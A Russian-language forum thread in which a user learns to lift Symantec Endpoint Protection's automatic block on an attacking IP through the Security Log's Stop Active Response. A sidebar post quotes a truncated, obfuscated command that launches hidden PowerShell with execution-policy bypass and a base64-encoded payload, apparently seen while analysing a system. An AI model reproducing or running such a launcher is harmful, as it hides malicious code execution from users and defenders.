Перейти к содержанию
2600

Symantec Endpoint Protection

Recommended Posts

2600

Мне нужно разблокировать атакующий компьютер, заблокированный firewall ом.

Я так понял это нужно делать через журнал Network Threat Protection Log.

Там найти это событие атаки и в закладке выбрать Stop Active Response.

Но у меня не активны (находятся в сером) эти две позиции, кроме этого Stop All Active Response.

Или может нужно отменять где то в другом месте.

Конечно на крайний случай можно и вообще это правило вырубить - но это не дело.

Пожалуйста подскажите.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Кирилл Керценбаум

2600 эта функция работает только в разделе Security Log и только в случае что хост блокируется по одной из сигнатур IPS. В таком случае необходимо найти запись об этом и на ней выбрать Stop Active Response.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
2600

Раздобыл русское руководство, но к MR1 (client_guide.pdf) , у меня установлено MR2 English там пишут цитирую

"

Блокировка атакующего компьютера

Когда клиент Symantec Endpoint Protection обнаруживает атаку из сети, он

автоматически блокирует соединение, чтобы обеспечить безопасность

компьютера. Клиент активирует активный ответ, в результате чего все

соединения с IP-адресом атакующего компьютера автоматически

блокируются на заданный интервал времени. IP-адрес атакующего

компьютера блокируется в одном расположении.

Обновление сигнатур IPS, сигнатур атак типа "отказ в обслуживании" и

сканирование портов также может вызвать активный ответ.

IP-адрес атакующего компьютера можно узнать в журнале безопасности.

Если блокировку атаки необходимо снять, то следует остановитьактивный

ответ в журнале безопасности.

Как заблокировать атакующий компьютер

1 На боковой панели клиента выберите Изменить параметры.

2 В разделе "Защита от угроз из сети" нажмите кнопку Изменить

параметры.

3 В окне "Параметрызащитыот угроз из сети" выберите Предотвращение

вторжений.

4 Выберите Периодавтоматической блокировкиатакующегоIP-адреса

(в секундах) и укажите количество секунд.

Допустимы значения от 1 до 999 999 секунд. Значение по умолчанию -

600 секунд (10 минут).

5 Нажмите кнопку OK.

Если IP-адрес необходимо разблокировать раньше стандартного срока,

это можно сделать вручную.

Как разблокировать атакующий компьютер

1 На боковой панели клиента выберите пункт Показать журналы.

2 В разделе Управление клиентами выберите Показать журналы >

Журнал безопасности.

3 В журнале безопасности выберите строку со значением "Активный

ответ" в столбце "Тип события", затем нажмите Действие>Остановить

активный ответ.

Для того чтобы разблокировать IP-адреса, выберите Действие >

Остановить все активные ответы. После разблокирования в столбце

"Тип события" будет показано "Активный ответ отменен". После

истечения срока автоматического ответа в столбце "Тип события"

появится значение "Активный ответ отключен".

4 В окне сообщения нажмите ОК.

5 Выберите Файл > Выход.

"

Видимо они его еще не сделали. Но планируют. Я так думаю.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Кирилл Керценбаум
Видимо они его еще не сделали. Но планируют. Я так думаю.

Что не сделали? Только сейчас попробовал, все работает!

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
2600

Всё - работает. Огромное спасибо. Извините, я всё время смотрел не в тот журнал.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

  • Сообщения

    • PR55.RP55
      Допустим: '%WINDIR%\syswow64\cmd.exe' /c powershell -nop -exec bypass -win Hidden -noni -enc aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYg... '<SYSTEM32>\rundll32.exe' <SYSTEM32>\FirewallControlPanel.dll,ShowNotificationDialog /configure /ETOnly 0 /OnProfiles 6 /OtherAllowed 0 /OtherBlocked 0 /OtherEdgeAllowed 0 /NewBlocked 4 "%WINDIR%\syswow64\windowspowersh... Было бы неплохо, если бы в Инфо. объекта. Прописывались данные по настройке  разрешений Firewall. + Отдельная категория по Firewall - что разрешено, что заблокировано.
    • SQx
    • SQx
      Спасибо,  как раз появился новый случай.
        DhcpDomain REG_SZ domain.name DhcpNameServer REG_SZ 192.168.1.1  
    • demkd
      ---------------------------------------------------------
       4.11.9
      ---------------------------------------------------------
       o Твик #39 теперь дополнительно включает отслеживание командных строк завершенных процессов, командные строки отображаются в окне информации.
         Только для Windows 8.1/Windows Server 2012 R2 и старше.  o WLBSCTRL.DLL теперь автоматически получает статус подозрительного файла.  o В окне информации сетевого адаптера (в разделе DNS) теперь отображается поле DHCP Domain при его наличии.  
    • PR55.RP55
      https://habr.com/ru/post/214953/ На подобное событие антивирус также может реагировать - если сервер будет в чёрном списке. Да и уязвимости...  
×